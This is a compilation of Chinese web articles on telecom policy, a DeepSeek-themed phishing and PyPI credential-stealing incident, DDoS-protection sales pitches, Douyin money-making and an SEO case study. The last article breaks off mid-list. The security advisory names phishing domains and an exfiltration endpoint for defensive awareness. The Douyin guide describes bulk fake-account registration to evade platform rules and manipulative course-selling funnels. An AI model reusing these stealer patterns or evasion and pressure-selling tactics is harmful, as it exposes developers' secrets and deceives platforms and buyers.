管理原则:实施“内外资一致”监管,确保公平市场环境。 审批流程:试点地区外资企业可直接提交业务申请,简化准入程序。 2. 市场影响 服务多元化:引入跨国企业技术经验,提升国内云计算、数据服务能力。 激发创新:通过竞争推动本土企业优化服务,加速数字化转型。 消费升级:为个人用户提供更丰富的数字产品(如跨境支付、智能医疗等)。 增值电信业务定义与范围 指基于公共网络提供附加信息服务的业务,包括: 互联网数据中心(IDC) 内容分发网络(CDN) 电子商务平台 在线交易处理(如金融支付、供应链管理) 企业级云服务等 未来展望此次试点标志着中国电信业开放迈入新阶段。通过引入国际头部企业,不仅可优化国内数字基础设施,也为全球企业参与中国数字经济提供通道。下一步,政策或逐步扩大至更多地区,推动形成“双循环”发展格局。 #### 多个伪装成 DeepSeek 的钓鱼网页被用于窃取用户登录凭证 2 月 7 日消息,中国移动专责网信安全专业子公司启明星辰官微今日发文披露,近期多个伪装成 DeepSeek 的钓鱼页面被用于窃取用户登录凭证,且在 Python 软件包索引中发现恶意软件包“deepseeek”和“deepseekai”,已被删除。 这些恶意软件包在开发者设备上执行后,会窃取系统数据及环境变量中的敏感信息,包括 API 密钥、数据库凭证和基础设施访问令牌,对软件供应链安全构成严重威胁。 该公司表示,当前存在钓鱼链接、PyPI 投毒等安全事件。 钓鱼链接 以钓鱼网站“https://deepseeklogins.com/”为例,其页面结构和风格与 DeepSeek 官方网站高度相似,旨在通过伪造官方页面来诱导用户泄露敏感信息。与真实网站相比,钓鱼页面移除了中英文切换的超链接。在该钓鱼页面中,点击右上角的“API Platform”链接将会引导用户跳转到伪造的登录页面。 在伪造的登录页面,即便用户输入正确的用户名和密码,页面也会提示用户名或密码错误。用户名和密码信息将会被发送至 https://chat.deepseek.com/ api / v0 / users / login 接口中,并且该登录页面会不断获取当前浏览器版本等信息。 其他恶意钓鱼网址如下: https://deepseek.boats https://deepseek-shares.com https://deepseek-aiassistant.com https://usadeepseek.com deepseek-login.com/ deepseeklogins.com/ deepseeklogin.xyz/ deepseeklogin.me/ deepseeklogin.co/ deepseeklogin.us/ PyPI 投毒 2025 年 1 月 29 日,用户 bvk(该账户于 2023 年 6 月创建,且无其他活动记录)在 Python 软件包索引(PyPI)上传了两个软件包:“deepseeek”和“deepseekai”。 经安全研究人员分析,deepseeek 软件包的哈希值为 0bd29789ab155b95fbb11e44afc39b1fbb555bbbcacb210b03fed5a22e0fa03b,其文件名为 deepseeek-0.0.8-py2.py3-none-any.whl。该软件包的主要功能是获取执行环境的用户名和主机名,并将这些信息发送至 https://eoyyiyqubj7mquj.m.pipedream.net。 deepseekai 软件包的哈希值为 a68ff8f2124ebb707e86710a4bd1f376f0d867ee7d1d62ad8e518ed1c27d05d2,其文件名为 deepseekai-0.0.8-py2.py3-none-any.whl。该软件包不仅会收集用户名和主机名,还会获取环境变量信息,并将所有收集到的数据发送至 https://eoyyiyqubj7mquj.m.pipedream.net。 从代码的注释风格和结构化编写方式来看,两段恶意脚本可能是在 AI 的辅助下生成的。例如,代码中的典型注释格式(如# Suppress all warnings、# Attempt to get user ID with id command)以及代码逻辑的组织方式,符合 AI 生成代码的常见特点。此外,代码采用了异常静默处理(pass 语句),以及禁用 SSL 证书验证(verify=False),这些也是 AI 生成代码时可能出现的模式。 代码中 https://eoyyiyqubj7mquj.m.pipedream.net 是 Pipedream 平台提供的 HTTP 端点,可用于接收、存储并处理传入的数据。任何发送到该 URL 的信息都会被 Pipedream 记录,并可能用于后续分析或进一步操作。 启明星辰表示,企业和开发者应提高警惕,严格审查软件来源,加强安全防护措施,定期监测依赖项安全性,以防范潜在的数据泄露和供应链攻击风险。 防范钓鱼链接攻击 核实网站域名:仔细检查 URL,确保拼写正确,避免访问伪造官方域名(如 deepseeklogins.com 可能冒充 deepseek.com),确保网站使用 HTTPS,但警惕 HTTPS 证书不代表网站安全。 避免点击可疑链接:不要随意点击邮件、社交媒体或聊天软件中的未知链接。 定期更新密码:使用强密码,定期更新,并在不同网站使用不同凭据。 监控账户异常登录行为:发现可疑活动立即更改密码并联系官方支持。 防范供应链攻击 审查第三方依赖:下载软件包前,检查 PyPI 发布者信息、下载量和社区评价,避免使用来源不明的库。 验证软件完整性:使用 hash 校验(SHA256 等)验证软件包是否被篡改。 限制环境变量暴露:避免在代码或日志中明文存储 API 密钥,使用环境隔离和最小权限原则。 监控异常流量:定期分析 HTTP 请求日志,防止敏感信息被发送至未知服务器。 #### 大V“小牛说车”告诉站长一件事 根据最新消息,抖音500万粉丝的“小牛说车”帐号被封了。 目前抖音上已经搜索不到他的帐号了,这个在抖音汽车圈十分火的帐号,就这样没了。 其中原因,我们不得而知,但是却告诉站长一件事:第三方平台并不安全。 近几年很多公司为了省事,都不做独立网站了,都跑去运营第三方平台了,比如百家号、抖音、快手。 诚然流量来得非常快,但是也非常危险,你的帐号并不属于你的,所有权都是平台的。 平台只需要找个理由就可以把你封了,或者直接给你降权,让你的视频、文章没有流量。 辛苦运营的帐号,平台只需要一句话,一招回到解放前。 所以,相对安全的还是自己做网站,域名、服务器、内容都在自己手上才是最安全的。 如果小牛说车之前有运营网站的话,即使流量没有抖音高,但现在起码不至于直接所有内容消失吧。 #### 大型网站用哪些服务可以加速稳定 之前一直有朋友问我大型网站应该用哪些产品网站速度更快些,主机吧也没经手过大型网站,不过这几天经手了一个大型网站,流量一天在50万IP左右,PV200万这样,社区来的。主机吧帮助客户做网站防护,也了解了一些大型网站使用的产品,今天主机吧就来给大家介绍下,大型网站都用到哪些服务来运营的。一、云服务器毫无疑问云服务器是大型网站运营的必选,安全、稳定,可弹性升级配置,可在不关机的情况下升级CPU、内存、宽带等配置,这是大型网站需要的,因为大型网站关一次服务器会损失很多钱的,国内云服务器实力的阿里云、腾讯云、华为云还有百度云,虽然百度云市场占有率不高,不过技术绝对没有掉队,而且有SEO优势,不防可以参考下。二、对象存储可以把网站生成的静态文件全部存到专业的对象存储服务器上,很多小型网站习惯把全部资源存在一台服务器,这方法对大型网站没用,一个大型网站少说也几百G的资源,如果全存在一台服务器上,即使你用的是SSD硬盘,也会受不住这么大的IO读取量,导致服务器访问变慢,所以对象存储服务的作用就出来了,这种服务腾讯云、阿里云都有,阿里云叫OSS,腾讯云叫COS,百度云叫BOS,都一样的功能。三、独立云关系型数据库像一些PHP运行环境用到的MYSQL数据库,小网站会把MYSQL数据库创建保存在本地服务器,而大型网站则不能这么做,因为大型网站调用的数据库频繁,可能会严重占用服务器资源,我们需要的是把数据库放到专业的数据库服务器上,所以各大云服务商就推出了,独立的MYSQL云数据库服务,阿里云叫云数据库RDS,云数据库的好处在于其更安全,而且不占用网站服务器的资源。四、CDN加速CDN加速也就是内容分发,其原理是通过域名访问的流量会调到CDN附近的节点,可以有效减少服务器宽带压力,同时也也可以加速访问。很多站长觉得网站服务器其实已经很快了没必要用CDN,其实CDN有个更重要的做用是可以隐藏源服务器IP,隐藏源服务器IP很重要,因为大型网站一直总会有那么几次被一些无聊的人攻击的,这个时候有CDN的话就可以防止别人DDOS攻击你的IP,导致你IP被机房封,造成更大影响。不过一些普通CDN遇到攻击可能会给你回源,所以建议使用一些带高防的CDN,比如百度旗下的百度云加速就是带防护加速的,非常不错。 #### 大家网站被DDOS攻击都是怎么解决的? 大家网站被DDoS攻击都是怎么解决的?今天有站长咨询主机吧这个问题。 说实话网站防御DDoS攻击还是很容易的,因为网站DDOS攻击峰值都不大,一般最大也就一二百G,最普遍的就10G-30G,不像游戏这些动不动就几百G。 所以网站防御其实成本并不高,市面上很多防御产品都是可以防网站DDOS攻击。 我们只需要把源服务器的IP隐藏好,然后购买一些商业防御产品进行转发防御就可以了。 比如百度云加速CDN,提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 百度云加速商业版提供10-30G左右的DDOS峰值防御能力(百度云加速防御其实防御能力更高,一般一两次攻击超百G,只要不影响整体网络百度都会给抗的), 基本可以解决90%以上的网站DDOS攻击了。 如果有非80、443端口要求的,则需要购买高防IP进行转发,大厂商的高防IP价格都比较贵,几千几万一个月不等,主机吧这边价格便宜,一般80G峰值防御只需1600元/月,非常便宜,欢迎咨询。 #### 大流量DDoS攻击如何防御?低成本替代阿里云高防方案,节省90%费用 在线业务遭遇了大流量DDOS攻击怎么办? 所谓大流量DDOS攻击一般是指遭遇到100G以上的峰值的DDOS攻击,这类攻击往往因为流量高,在云服务商购买DDOS防护的话价格太高,让人望而却步,比如阿里云100G DDOS高防一个月价格就高达76800元/月,这已经不是一般公司能买得起的了。 那么除了买阿里云这种价格高得离谱的高防方案,还有别的便宜的方案吗?刚好最近主机帮刚好有位阿里云的客户遭遇了大流量的DDOS攻击,我们就用很低的成本给客户解决的DDOS攻击问题。 现在我们来聊聊我们为客户解决大流量DDOS攻击的解决方案。 1.高防CDN 如果你是网站业务,而且不想更换服务器商,那么可以使用高防CDN来进行防护,你需要做的是把原来被DDOS攻击的服务器IP更换一个新的,然后把业务域名解析至高防CDN提供的cname记录上,使得高防CDN把你服务器的IP隐藏起来,达到替身防御的作用。 市面上有很多共享节点型高防CDN,价格都比较低廉,往往几百块一个月,甚至一千多块一年就可以了,但这些高防CDN往往防御不算高,防御几十G算高了,适合中小型攻击,比如百度云防护和京东云星盾。 百度云防护 Web应用防火墙WAF 防黑客入侵 CC攻击拦截 网络爬虫拦截[出售] ¥299 ¥399 库存:9.9k 已售:99.9k 人气:9.2 京东云星盾 安全加速 SCDN 高防CDN 隐藏IP ddos防御 CC攻击防御[出售] ¥720 ¥900 库存:9.9k 已售:103 人气:4.2 想要大流量防御的,可以用我们速度网络的独享高防CDN: 独享高防CDN 独享IP节点 单节点高防 大流量DDOS防护专用[出售] ¥1999 ¥1999 库存:9.9k 已售:688 人气:2.1k 我们的独享高防CDN专为遭遇大流量攻击的用户使用,通过多个独享带宽、独立高防的CDN节点融合,实现多点防御。当某高防IP节点遭遇大流量攻击超过清洗峰值后,自动下线,其它高防节点自动替代访问,被攻击节点恢复后自动上线,实现永不断线效果,提供黑客攻击门槛。 独享高防CDN套餐每个节点的防御峰值都是相同,带宽也相同,而且只为你服务,不存在共享不稳定的缺点,让你享受VIP服务。 2.高防IP 跟阿里云的DDOS高防一样,我们也提供一个高防御的高防IP对业务进行转发,区别在于我们价格更便宜,你只需要把原服务器IP更换一个新的,然后购买我们高防IP进行转发隐藏新的源服务器IP,达到替身防御的作用。我们的高防IP 30G起步,最高可达可防御1T峰值,价格比阿里云这些大厂便宜很多,而且是独享的,支持DDOS查看,CC攻击查看,攻击自动警报、全量访问日志,让你清洗查看网站什么时候被攻击,攻击多大,攻击时长等。 亿速云高防IP 30G 60G 100G 200G 300G DDOS防御 CC攻击防护 独享高防[出售] ¥1000 ¥1000 库存:9.9k 已售:638 人气:10b 3.高防服务器 如果你是游戏业务等时实在线业务,那么我们推荐用裸金属高防服务器,他不仅服务器配置高,同时带自带高防御,可有效解决大流量DDOS攻击,而且价格并不贵。 线 路:中国华东BGP高防二区 CPU 型号:Intel Xeon E5-2660 v3 CPU 主频:2.6GHz 睿频:3.3GHz CPU:40 vCores 内存:64G 带宽:50Mbps 防御值:100G ¥ 1,899.00/月 如果你需要更高配置,可进入速度网络查看:https://www.suduwangluo.com/bms/custom-purchase.html 以上就是主机帮的针对高大流量DDoS攻击的解决方案,希望可以帮到大家,如果您觉得价格不满意,或者配置不够高的,也可以联系咨询我们,总会有合适您的防御方案。 #### 大神记:抖音日入两万是怎么做到的? 本来想写日入十万,即便这是真实的,想想可能会挨骂,算了,低调。本文标题的日入两万不代表只赚两万,作为标题我把这个数字压缩到极度收敛,请勿刻板理解,对于卖货来说,日入两万是个很小的收益,另,本文展示所有图片均为独家真实数据 我在微信上很少发言,静静的看看微信群友的一些聊天 从他们的聊天中会发现最近的热点 最近看到一个网赚群在聊股票的多了起来 我的第一反应是,不好,韭菜要入场 股票我也炒,但是我的一次交易周期是一年以上。 这种火热场景似曾相识 发生在两年前的虚拟币 不知道两年前在市场暴热疯狂买进虚拟币的人现在光景如何 其实我也是那波韭菜之一 不同的是,我本就没有打算依靠拿东西暴富 买了一万个EOS,一直拿到了现在 其价格如同心电图曲线的波诡云谲,琢磨不透 上能上到快150元,下能下到区区十元 可以说经历的EOS的繁华和落寞 为什么我这么能稳得住,是因为这部分钱我只是使用闲钱来玩一玩,亏了赚了,对我来说都无关紧要 我奉劝各位,千万不要幻想通过金融投资来暴富,你会很惨的。 归根结底,我们需要一份事业 2020年,抖音这份事业是我们一定要参与进来的。 从2019年下半年起,抖音开始显现他的威力 你觉得下面这样的目标难么? 一个小团队,两三个人,批量起抖音千粉号起号→卖号→起号→卖号迅速做到月入20万 一个恋爱话术的小程序通过抖音引流,小程序成交每天撸1万,半年的时间内收益200万 一个0粉号,运营不超过三个月单场销售50万,一个星期净利润三十万 一个19年下半年开始的抖音培训机构每天十万的抖音广告投入,换来每月千万的营业收入团队迅速送十几人发展到500人 这一切的逻辑是什么? 流量 流量在哪里,金钱就在那里 互联网的发展历程让这条定律成色更足 我为什么这么推崇抖音,不单单是他的赚钱效应 客观来说,做抖音的未必都能赚钱 硬币都有正反面 与我上面说的截然相反的团队 也有陷在抖音泥潭中苦苦挣扎的 遇到的无非是以下的问题 无法涨粉 有了粉丝无法变现 变现收益不足 变现途径失效 这些问题我没法一一给你具体分析,也不是我这短短的千字篇幅能说清楚的 跳出具体操作层面,用一个更高层次的视角来看这个问题。  1,我们是不是总是要盲目追所谓风口  想到了前段时间,和*电会一大佬的谈话 之前聊的都很同频,直到聊到了抖音 可能因为我们都是湖北人 湖北人中最出名的不过雷军,雷军的著名风口论也是人尽皆知 这哥们自然也受到影响,他说 我们要追风口,抖音虽好,但是TIKTOK机会更大,因为做的人少,刚刚起来 我说,要说风口,抖音这个事是未来十年的机会 不要盲目去追求最新的东西 有可能挖到金矿,更可能会死的很惨 新的东西意味着着 没有经过市场的充分检验,变现逻辑不清晰,不确定因素太多 结合最近TIKTOK在印度和美国的遭遇 你品,你细品 雷军的话在他的角度是一点问题都没有 但是,清醒点,人和人的高度不一样 他看到的风口和我们的风口是不一样的 雷老板看到的风口,他有足够的实力去试错,我们没有 2,为什么现在是玩抖音的最好时机  前两年,大家玩抖音 更多的是奔着轻松涨粉去的 做的人少,涨粉的速度飞快 但是硬伤是,粉丝涨上去了,发现变现无比困难 想一想是不是 你去新媒易上看看 我们平时看起来高大上的百万粉丝号也不过才几万块钱 是不是很掉价,很跌份 但今年不同了,在yiqing的催化下,大家憋在家无聊到爆 抖音的使用时长上来了,抖音的用户数起飞了,抖音商业化加速起飞 所以才有了我开头的那一段,各色各样的赚钱的方式涌现出来了。 变现模式出来了,才是我们入场的最好时机。 我说的判断是不是对的,你可以回想下电商和微商的发展历程不言自明 淘宝成立于2003年,到现在走过了17个年头 可是电商代运营,电商店群培训,淘客等依旧如火如荼 微信2011年推出,2013年微商星星之火,到现在依旧大批量微商活的很滋润 而抖音,2016年下半年上线,真正商业化也不过才刚刚开始..... 你还会觉得你进入抖音的时机不好么? 3,抖音短视频流量逻辑 抖音的变现模式不是一成不变的  比如我文章开头说的,批量起千粉号,批量卖号,现在已经很难了 为啥? 批量起号的原理是批量注册新号,批量搬运剪辑视频 高产的团队,一个人一天维护几十个号一点问题没有 但是现在,抖音账号指数级上升,抖音爸爸不轻易的给你流量了 一个新号,抖音平台给你流量的逻辑是什么? 内容 怎么衡量内容,大家关注抖音运营的都知道 老生常谈的五大要素 完播率,点赞,评论,收藏,转发 这五大要素经过加权平均,就是你内容质量的整体得分 得分高的给你推送一波精准流量,再根据用户反馈继续打分 打分→推送→打分→推送→打分...... 所以你的短视频火不火流量有多少,取决于你跑到循环的第几个阶段 抛开特殊账号,抖音起流量真的不难 比如,拿我们自己做测试的影视剪辑号为例 区区六个作品,最高的一个直接一千万的播放,直播间涌进5千多人,高峰的时候直播间破万人。 这是其中区区一个测试账号 你知道么,做剪辑号,一个人一天批量剪辑二三部技术难度并不大 到这一步,其实在抖音上,稍微有点悟性的人,引流难度不大。 4,不能变现的流量是毫无价值的  我大概罗列下我熟悉的几种变现方式 卖货(短视频卖货,直播卖货) 抖音小程序 抖音培训(影视剪辑收徒,批量投放抖音广告培训,大V培训) 抖音引流到微信变现(比如恋爱话术,风水,取名,情感挽回,微商) 1)关于抖音小程序,市面上已经比较多了  你可以选择一家加入,也可以自己搭建一套系统 小程序市面上的技术交流群已经很多了 个人的一点见解是 新+概率 新就是内容新,你把别人发过n多次东西再剪辑注定不会有大流量 “新”不是万能的,为什么说到概率,这个牵扯账号的权重,账号的数量,作品数量 有时候你会骂娘。 有时候会出现,同样的内容你先发甚至不如后来者 这个时候,我们得有足够的号和视频数拼概率了 只有有了足够的作品,你才能碰到其中某一条说不定就满足了抖音五要素的打分逻辑。 这块不是本文重点,点到即止 这套系统难度不大,两三万就能搞定一套小程序后台系统,还能附赠小程序 没有推广实力的不建议自行搭建 2)抖音恋爱话术(抖音引流+微信小程序变现) 而一套微信恋爱话术小程序系统大约也在一万左右,我们需要的就是去抖音引流 操作方案: 每天在抖音上发的视频很简单,大多数是把如何使用这个微信小程序的操作流量录制发抖音。 一般来说,操作这种项目,需要准备10-100个账号,每天发一到三条 目前大家普遍的操作方式是 一机一卡一号 如果100个账号,就需要准备一百台手机 可以使用安卓手机,如果使用iphone,建议iphone6 450左右一台 注册卡可以使用正常的手机号,购买流量包,每个号独立流量图方便的话,也可以使用17*开头的虚拟号码,注册后使用同一个流量(经过实测,上面两种方式都可以,但是抖音的政策时刻在变化,没有定式) 最近,我一行内朋友的注册方式是开车去异地注册抖音号,当然这个可能和他所在的地域有关系,是个小县城,如果你在一二线大都市,如果你不是批量注册,大可不必。 3)抖音培训(影视剪辑收徒,批量投放抖音广告培训,大V培训) I) 先来说说影视号,影视号的有点在于门槛低,见效快,能变现 影视号的做法并不复杂,正确的玩法流程如下 起号(批量号+重点号)+ 上热门(拼概率)+ 上播 + 引到到微信 + 成交(收徒) 虽说是批量,但是你得有批量的剪辑技术,影视获取资源,剪辑技巧,运营直觉。还有使用个人号做没问题,但是如果你有公司能做企业蓝V认证,那是更好不过,天然的权重就会高些。 比如你的客服pr技术是否过硬(有些人使用剪映剪辑,但是批量做号一定要用到premiere),你的模板搭建是否完善,你的开画一秒钟是否足够存在G点,你是否能获取最新或者最老额免费电影(国内的,国外的),如何制作4K超清视频 其实我们测试的时候多半是使用国外的,包括油管等网站,这又涉及到了如何搭梯子,如何下载超高清视频,所以抱歉,这里真心讲不完。 影视号的好处是,一个作品火了很快会带火其他作品 并且在作品火了以后迅速直播,直播间很容易达到几千人 一场万人直播引导的好的话能加几百人进入微信流量池 配合一个好的朋友圈,适中的价格,成交并不难。 下方这个号一个作品火了以后开播加了500微信好友,做了一个多月,收徒快500人(599一人),收益就在30万左右,而成本,能够控制在3万以内,甚至除了出个体力,一个小团队,两三个人,一个小房子,几乎就没花什么成本。据我了解,目前这么操作多数都是很小的团队 影视号除了收徒,还有的变现方式就是接星图广告+卖号 星图广告一万赞能有一百多元,而门槛仅仅是过十万粉丝。 最不济卖号,一个粉的收益在5分到一毛之间,一个十万粉丝的号卖个大几千元一点问题没有。 ...... 包括抖音培训方面,电影号培训变现虽然容易,多数是小团队在做,不成团体系。 真正的大鳄是后面两种变现方式 II)批量投放抖音广告培训+腾讯课程 大量投放巨量引擎广告获取表单,客服电话获取微信,把微信用户吸引到腾讯课堂。 通过三个小时的清洗,主要手段是部分干货+大量素材案例+讲课技巧,反复xi脑 下方是我们花费一万元获得得数据。 金牌讲师有超过百分之五到百分之十的成交率。 500人听课能成交30人到50人 一个人接近4000元的培训费,一堂课成交十几万 一天三到五个讲师开课十堂课(主要集中在下午到晚上) 最后的数据是每天投放8万到十万广告费,月收益在千万左右。 付费课程方式是线上课程,为期两个月,老师授课的一切目的就是为了避免客诉。 这块不做过多揭秘,毕竟影响其他人财路 III)至于大v,以杜*建,天*姐为例 想必大家经常在抖音上刷到杜子建的广告 套路与上方有区别,更接近微商以及传统chuan销会销大佬的的打法 支付99元拉你进微信群听课 这里需要说明的是,你所看到的杜*建的广告未必是杜*建本人投放的,很多是他的徒子徒孙在投放。 99进群后,杜通过多群同步软件在微信群开课,为期5天 与其说是课程,不如说是在对你长达5天的勾引,最终目的而只有一个:乖乖掏腰包,花2980元参与线上课程。 杜*建为这些人做背书,提供视频创意,当然你如果想要得到他的背书,一来送钱是少不了的,二来,杜团队有收入分成 你以为交了2980元就完事了么 这不过是开胃小菜,还有更大的诱饵等着你 让你花费几万几十万,说白了,这个割韭菜不再是作坊式,已经形成了一套完善的收割体系 本文的重点很简单,哪怕是你目前没有找到很好的抖音变现方式,也要保持耐心。 抖音的整个商业化不过才是开了个头,目前已经一大批人在上面赚到盆满钵满 假以时日,必将成为造富机器,一如这前些年的电商,微商 作者:海涛 微信:8184680 #### 大站建成案例:网站从0到10万流量经过 历时20个月,网站流量最高峰达到10万UV。作者在此复盘总结从0到10万流量的成长过程。案列也许不能复制,但经验和思路有一定的借鉴价值,供大家参考。高能预警!此文长度感人,没有耐心的请及时止损。 一、网站定位 住宅在线的主营业务为农村建房、农村别墅图纸,因此意向客户显然是关心自建房领域或者有图纸需求。因此网站定位为提供农村自建房领域相关资讯以及付费别墅图纸。 二、可用资源 1.团队配置 对于网站来说团队配置是完善的,与SEO有关的成员职务有:编辑、产品经理、开发、UI、数据分析师、运维。完整的团队意味着SEO只需要专注自身职责,流量与转化。 2.网站基础设施 域名:zhuzhai.com为17年老域名,直译为住宅。与网站领域有一定相关性,且容易记忆。 服务器:阿里云服务器,速度快如闪电,由运维专人维护几乎没有出过问题。 前端:定制的商城模板,后期有前端进行维护,基本可以满足SEO需求。 后台:配套的后台系统,有php进行维护,基本可以满足SEO需求。 增加:独立移动端、MIP页面、百度小程序 三、SEO策略 1.网站框架 网站框架需要确定的是主要内容生产页面是哪些。规划页面如下: 资讯页面:针对农村别墅建房过程所涉及的各个方面进行细分,找出对应的小分类关键词,然后进行内容覆盖,确保覆盖到所有细节。 图纸页面:提供别墅效果图、施工图、平面图等图纸覆盖不同的用户需求,完成转化。 建房直播:建房直播板块,图文展示用户建房的全过程(购买、转载、吸引用户主动分享) 问答频道:新增问答频道,准备问答小分类,内容覆盖到各个分类。 专题页面:主要为业务转化服务,页面内容为广告单页,由流量页面引流。 最后因为各种原因建房直播、问答频道未上线。主要流量来源为资讯,图纸页面产量不足。 2.竞品分析 我们网站定位是垂直于农村建房领域,通过农村建房、别墅图纸等核心关键词的搜索,发现该领域主要竞争集中在图纸页面,已经有一些高权重的网站对图纸流量进行垄断。如果直接正面竞争显然希望渺茫,于是整个网站内容重心放在建房领域相关资讯。这块内容对于百度而言是稀缺、分散的。这个思路是后面流量能高速增长的关键词因素之一。 3.词库建立 此领域内容没有其他网站可以借鉴,因此需要自己深入该行业了解建房过程中的所有细节。从流程上来大致可以分为:建房准备、动工建房、竣工装修、家居生活。考虑到装修、家居领域大站过多,流量获取困难,于是前期把关键词锁定在建房准备、动工建房、农村相关。 词根的挖掘方法有很多,你可以通过相关书籍或者资料然后记录下该领域独有的名词作词根。如在农村建房领域最大的词根便是农村自建房、农村别墅等。细分下去有地基、悬梁等专有名词,每个人都可能有自己的挖词方法,但最终目的就是要尽可能找出整个领域的用户需求,完成内容覆盖,最后获取流量。这些长尾词竞争力度小、用户精准,是流量宝库。 具体词库建立方法参考:SEO实战经验之挖词技巧和关键词库建立 4.内容生产 内容生产主要以资讯为主,围绕关键词覆盖行业内容。编辑人员配置预计8人,实际全职4人兼职2人,平均日生产文章60篇左右。内容规范如下: ①标题文字控制在18-25字左右(包含关键词),且在百度不能飘红,搜索结果30W以内。 ②开头结尾必须用自己的话手写且内容丰富包含关键词,不能出现相同模板。 ③文章800字,最好段落清晰,善用1,2,3,4这种小标题。不能出现大规模复制粘贴。 ④爱站按字符拆分原创度70. 内容生产是前期工作的重中之重,只有持续生产优质的内容才能快速获得搜索引擎信任,加速页面收录,提高网站整体权重。因此日常对编辑人员的SEO培训也是工作内容之一。 以上是从0到10万流量过程中的前期准备。前期的策略决定了整个网站的发展方向,可以说选择比努力重要。避开不必要的竞争,把资源倾斜在获取更大价值的方向是此策略能成功的关键词因素之一。而对内容质量的高要求为网站权威性奠定了坚实的基础。 网站前期准备工作做好之后,进入内容生产阶段,此阶段最重要的工作便是增加蜘蛛抓取频率,提高文章收录速度和收录率。部分网站优化细节不再赘叙,例如网站速度、URL静态化等等常规SEO操作。 四、收录问题 网站初级解决收录问题是头等大事,只有大量收录内容才有流量基础。 1.内容 保持稳定更新优质内容是解决收录问题的基础保障,内容规范已经在(一)中详细说明。 2.引蜘蛛 引蜘蛛的方式有很多,比如优质的友情链接、发布外链、蜘蛛池等。这些手法我都使用过,蜘蛛抓取频率的确有一定幅度上升,但是收录速度还是没有到达理想效果。 3.内部引导 这也就是常说的内链,通过网站内部布局引导蜘蛛抓取。通常情况下网站首页是权重最高的页面,可以在首页放置最近更新文章,更新频率为天,这样蜘蛛每次到达首页就会抓取站内最近更新的文章。同样文章详情页的侧栏也可以使用这样的策略。 4.熊掌号 熊掌号正好在去年被百度重点推广,跟进百度最新产品可以说是非常重要的一点,熊掌号解决了新站收录困难的问题,开通熊掌号一段时间后网站收录率上升到95%以上,十分可观。 熊掌号指数虽然一直不被大家待见,但是无名还是觉得熊掌号指数有一定的参考价值,并且在一段时间内,熊掌号是有分级的,不同指数级别不同,到达一定级别后有权重提升可能。 五、重要事件 1.HTTPS 那个时候的HTTPS还没有现在这样普遍,网上存在着很多HTTPS的负面影响。但是在做过全站HTTPS之后并没有受到太多影响,对网站信任度还是有所提升的。 2.MIP改造 MIP页面也是当初百度主推的一个项目,主要可以提升网站访问速度并获得MIP图标。原理就是在原有的页面上增加一套MIP页面。MIP页面实践表明当初为网站提升了一定权重。现在百度已经下线了MIP功能开始主推百度小程序,不建议再去改造。 3.独立WAP站 随着整个互联网流量向移动端倾斜。独立的移动站点也是势在必行的。在做好移动适配之后,移动端的收录是可以继承PC端的,并且拥有独立的排名,效果十分明显。就目前而言,网站移动端的流量是PC端的10倍还多,可见独立WAP站的重要性。 拥有独立的移动端之后需要注意的是移动落地页检测,这个如果长期处于不通过的状态,对整个页面的排名有一定影响,所以要经常检查,及时解决问题。 4.原创保护 原创保护的开通对文章排名收录是有优待的,因此在熊掌号推出原创保护后,那一段时间的工作重心便是如何通过原创保护。开通原创保护后为了保护文章质量,让编辑的文章产量下降了一半,这时候的文章是纯手工打造,耗时很高。流量虽然有一定程度上涨,但是并没有理想中大幅上涨的效果,原创保护在持续一段时间后被百度下架。但网站持续更新“原创文章”的词策略没有停止,这导致产量下降,很长一段时间流量没有大幅增长。 从这一点可以看出,如果不是拥有特殊权限,产量的优先度应该要高于质量。因为只有产量高了才能覆盖更多关键词,整体权重提升获得更高的排名。而质量即使每一篇是自媒体的标准,对于流量增长也效果不大。因此个人理解是文章质量能过标准线即可,用收录率衡量。 5.专业问答 这个是最近几个月才拿到的权限,申请了好几次终于拿下了。这种权限没有什么好说的,按照关键词生产符合内容便能获得特殊样式首页第一。即使最后没有获得特殊样式,提交的内容排名也会获得一定程度优待,这时候剩下的工作就只有关键词挖掘提交了。 6.百度小程序 也许很多人质疑百度小程序到底有没有用,至少在无名公司的两个站点的实践中,百度小程序上线都免费获取了上万流量。为何说是免费呢?因为百度小程序可以继承移动端的所有内容,因此只是内容的重复利用。 并且小程序的排名是真的不错,在最新功能中还可以使用百家号的挂载功能进行导流,如果你运气不错百家号有一篇10万的爆文,按1%的点击率能有上千的免费流量进入小程序。也许你觉得10万不可思议,但是无名就拿网站的文章发布在百家号也获得过最高50万的点击量,所以一切皆有可能。 还有一点很重要的是百度对小程序的重视程度是无与伦比的,我怎么看出来的呢?大家对于向百度反馈这个问题是不是深恶痛绝,从来没解决过问题?而百度小程序的反馈是非常及时的,几乎当天就能解决你所反馈的问题,效率之高让我受宠若惊。 六、流量增长 流量=页面量X收录率X平均点击量,这个公式可以简单看出流量增长的秘密。也就是只要你的页面收录足够多,就有获得流量的基础。前文已经说到在做好一切基础设施以后,文章的收录率到达95%以上。而大量关键词的挖掘以及筛选保证使用的关键词都有一定搜索量,其中很多长尾词可能收录之后便会拥有排名获取流量,而竞争度高的关键词也会因为内容矩阵、权重提升的影响慢慢获得排名。可以说流量只是最终结果,重要的是思路与分析。 整站优化我觉得是流量倍增的最好思路,因为如果你单纯针对某一个关键词优化,先不说流量太少,也没有人能保证某个关键词一直在首页,不可控因素太多。而整站优化会让搜索引擎认为你在这个领域足够专业、权威。一旦获得搜索引擎信任,你在该领域发表的内容都会获得较好的排名,这种权重不是第三方工具所检测的数值,需要自己分析体会。 七、细节感悟 1. 做网站最重要最困难的便是解决内容生产与质量问题。可以说内容生产是占据网站运营成本的绝大部分。而不管采集还是聚合,如果能让搜素引擎认为是高质量内容都是生产力上的重大胜利,当然前提是能够稳定,否则一旦被惩罚前功尽弃。因此怎么低成本生产高价值的内容是一个高阶SEO的价值所在,无名还在努力学习探索中。 2. 方向比努力重要。SEO需要清醒的明白自己手中的资源能够实现的效果,对策略做出合理的安排。举一个简单的例子就是首页关键词定位选择,有多少人能把SEO这个词做到首页呢?如果你是一个刚起步的网络推广公司,强行选择SEO这个词作为优化对象,就算投入大量资源又能起到效果吗? 3. 了解你所在的行业。大多数网站都是深耕垂直行业的,如果你对该行业没有一定了解,从何获取用户需求,构建词库。建议看几本该行业相关的权威书籍,从中提取要点。 4. 